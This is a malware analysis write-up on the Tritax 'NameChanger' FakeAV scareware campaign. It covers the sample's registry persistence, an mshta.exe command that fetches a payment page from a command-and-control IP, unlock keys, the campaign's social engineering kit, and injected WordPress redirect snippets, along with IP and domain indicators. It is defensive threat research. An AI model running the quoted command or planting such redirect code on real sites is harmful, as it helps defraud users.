This time I’m diving into an active FakeAV campaign, I’ve named it the NameChanger FakeAV, it falls under the Tritax family. Now why I named it the namechanger, just take a look the following image composed of screenshots of all the different samples:

Update (27-2-2014): Updated the end of the article with a list of domains and IP’s seen in the past 2 months. Tritax is still active and distributing.

Update (20-3-2014): After sinkholing and taking down the domains actively with the help of some friends it seems the Tritax actors gave up. The TDS’s stopped redirecting and no new domains are being registered, taking action against this campaign was successful!

Some time ago a friend, @VriesHd, pointed out a FakeAV spreading via businessinsider.com: http://urlquery.net/report.php?id=8495695 Not long after this, a similar thing happened to DailyMotion.com. A writeup for that was done by invincea: http://www.invincea.com/2014/01/dailymotion-com-redirects-to-fake-av-threat/ Skype advertisement has also been affected by the campaign: http://community.skype.com/t5/Security-Privacy-Trust-and/Skype-ads-in-rotation-have-been-compromised-and-contain-Malware/td-p/2894251

More recently the same campaign was seen by @Malekal redirecting via PopAds delivered advertisement: https://twitter.com/malekal_morte/status/426394544414793728 and another finding: https://twitter.com/malekal_morte/status/430050149650292736



David Jacoby from Securelist also published an article after Tritax started spreading via one of the largest websites in Sweden: http://www.securelist.com/en/blog/208216070/Largest_Website_in_Sweden_Spreading_Malicious_Code

The Tritax family has been around for a long time, the first sample of it was seen around may 2009. The current campaign drops a sample I have named NameChanger.C as its the third FakeAV type from this family that is constantly being repackaged with new names.

I’ll start of with an analysis of the current version of the FakeAV, after this I’ll go into the family, third will be the new FakeAV social engineering kit this group is using with their current campaign. I’ll end with a section which is a hashdump of all the samples I’ve been scraping from their backend.

Analysis

This sample drops from a specialized social engineering kit for FakeAV’s, I’ll get into details about this later. The name for this version is “Windows Accelerator Pro”, MD5: 0a0fd6b228e1edb56067c86304c15861 (VT: 20/48).

It initially installs itself in the usual startup location, the keyname for these samples are “GuardSoftware”:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] “GuardSoftware”=“C:\Documents and Settings\admin\Application Data\guard-hqxl.exe”

The filename is formatted as “guard-%s.exe”, as can be seen when running the sample through OllyDBG in the image below. Since the 1st or 2nd of February samples are now formatted as “svc-%s.exe”.





After the sample has installed itself it will force a reboot in order to make sure no other analysis tools are started. When its first ran (before the reboot) it will show a splashscreen:





Once the machine has rebooted it will show the usual fake scanning with detection of infected items:





Once completed the user gets a listing of all the affected files:





When you attempt to clear up the infections by hitting “Remove All” we get a message regarding activation. You cannot clean up until you active the product:Before we activate the ‘product’ lets have a look around at what it 'can’ do for us:All of course are unavailable to us unless we activate. When enabling one of the options we get the same “Activate” popup.There’s also an about section in the 'product’:

Besides the fake scanning and available options it will also show a variety of fake warning messages:





Some more aggressive warnings appear from time to time as well:





We are also, like usual with FakeAV’s, not allowed to start any applications because they are 'infected’:



It also warns us that we are torrenting and that downloading pirated material is a felony:







When we click the “Get anonymous connection” button we go back to the activation form again. When we hit the “Activate” button we are greeted by a payment form:





The form is retrieved by starting the Microsoft HTA client:

mshta.exe “http://93.115.82.249/?0=16&1=0&2=9&3=p&4=2600&5=1&6=1111&7=byuqshgtbm”

This is the C&C for this FakeAV, all subsequent traffic from this sample will go towards this IP.



Now if we go to the “Register” section we can 'activate’ the product:



We do need a valid key for this one. The key for this sample is:

1W111-111B1-11T11-E1121



Note: If you have any old infections from before July 2012 the key is “0W000-000B0-00T00-E0020”

When we enter the correct key we are allowed to activate:



As soon as we hit the “Register” button we are taken back to the scan results page and it will start 'cleaning’ up the infections:





Now if we look at the application it has all turned green and all 'functionality’ is available to us:



The about form is also updated with the activation date and serial:





The application stores the activation data in the registry like this:







“UID”=“lthsidoaat”

“net”=“2014-1-9_3”

“Config”=hex:de,07,01,00,<truncated> [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Settings]

The “Config” key holds the activation key as well:





This FakeAV has inbuilt translations for German, French and Spanish:



I’ve seen the following IP’s for the C&C’s in samples dating from November 2013 until February 2013:

93.115.82.249

93.115.82.248

93.115.86.197

Interesting fact; These guys have been using a valid license for ASProtect for many of their payloads. This makes analyzing and reversing a bit harder, especially unpacking the samples.

The Family

The FakeAV family that was spreading here is called 'Tritax’. It has been around for a very long time and @S!Ri has been writing about variants of this family for a long time. A big thank you to him for sharing some of the older samples of this family with me to get the timeline correct. You can follow his FakeAV findings here: http://siri-urz.blogspot.fr/



The first sample appeared around may 2009, it was called “Crusader Antivirus”:



This one displayed the usual fake warnings and fake scanning like we see now:This FakeAV was meant to look like the AGAVA Antispy application which was a legit application. Crusader mimicked most of the GUI of Antispy:This first sample is in fact where the “Tritax” name comes from, on the about dialog a company was described as “TRITAX Limited”:The samples for this one, MD5: 301b4ca82a0dc6931562e9b322ceb7c1

The 2nd installment of the family was called “SecretService”, this one has had 2 versions:



After the SecretService version, “Privacy Center” and “Safety Center” popped up:After those we were greeted by “Privacy Center” and “Control Center”:Now we are greeted with the first NameChanger variant, I’ve named it NameChanger.A. It first appeared in December 2010. It has been seen with the following names:The GUI has had a few changes but the general look stayed the same. A few samples:After variant A, the B variant: NameChanger.B appeared in May 2011. It has had the following names:And looked the same in every sample, only the name constantly changed:



And in February 2012 the first version of our NameChanger.C appread, it was named 'Windows Protection Manager’.



This shows how long this group has been active, 2009 until now. Their current campaign is still really active and spreading new versions of NameChanger.C. It seems they have now got a good setup going with the special FakeAV Kit.



The full list of used names so far for NameChanger.C:







The Social Engineering Kit

I encountered the first sample when being redirected from the Businessinsider website. While initially it seemed like a one-off I found out this is an actual package like you would normally see with exploit kits. In this case it relies on social engineering.



When landing on this kit a user is greeted with a javascript alert message:



106 pw

76 nl

30 pl

15 com

Then a page which shows a fake message from Microsoft Security Essentials. The message lists a number of items that are supposedly infected:When clicking the “Clean computer” message the user is prompted with a download with names like “Setup.exe” or “Install.exe”. This is when the user downloads the FakeAV and manually runs it. This way it looks believable that an Antivirus suddenly comes up talking about infections on your computer.I have found different FakeAV family campaigns using this Kit, the only one I have seen being updated on the landing page is the one for the Tritax group. Initially the landing page looked like this:Around the 10th of January it suddenly changed the JavaScript on the landing page to a crypted version.A week later on the 17th of January the landing changed again, only this time the crypted JavaScript snippets were put in external files called “scr1.js” and “scr2.js”. Landing page code:During this time the DNS for the landing of the Tritax group is always on a subdomein, this is either 'b2811a66’, 'c3913c6c’, 'e324rfds’, 'wed322d2’, '5c4e4143’ or '90d6bc5a’. Of course this will change from time to time, it just means the main domain never points to the landing server, its always a subdomain. Additionally the domains used by this group are registered at registrars allowing for domain tasting (5-day testing period, free!). The domains rotate every so few days. The first registar I saw them appear was Domeny.pl, they are current being tasted at Key-Systems GmbH. These are the stats in terms of TLD’s I have seen:



Here is a full list of all the domains used in the period of 1st of January 2014 until the 25th of January 2014.







These domains used custom nameservers, @vriesHD has done his best taking these down for the past months. The IP’s I’ve seen used in this campaigns landing pages are:

93.115.82.246

93.115.82.247

93.115.86.199

212.83.137.239

212.83.138.29

212.83.138.30

212.83.155.45

The following domains have been seen for the custom nameservers:

dsfe1.com

dsfe2.com

svav1.com

svav2.com

stav1.com

stav2.com

isavx.com

isavh.com

ispav.com

ispax.com

Additionally to advertisment and spam mail spreading these guys have also compromised a large number of websites. All websites compromised are Wordpress websites. A malicious PHP file was uploaded after exploitation. This file gives redirects to domains listed above (and the new ones still being generated). These pages respond with:

window.top.location.replace(“ ***tritax campaignlanding page*** ”);

They can usually be spotted when websites have javascript snippets loaded like:

<script src=“/wp-includes/js/jquery/jquery.php”></script>



The full list of websites affected (some of them have already cleaned up or have gone offline):





Collected DNS information from January -> February 2014

Collected Samples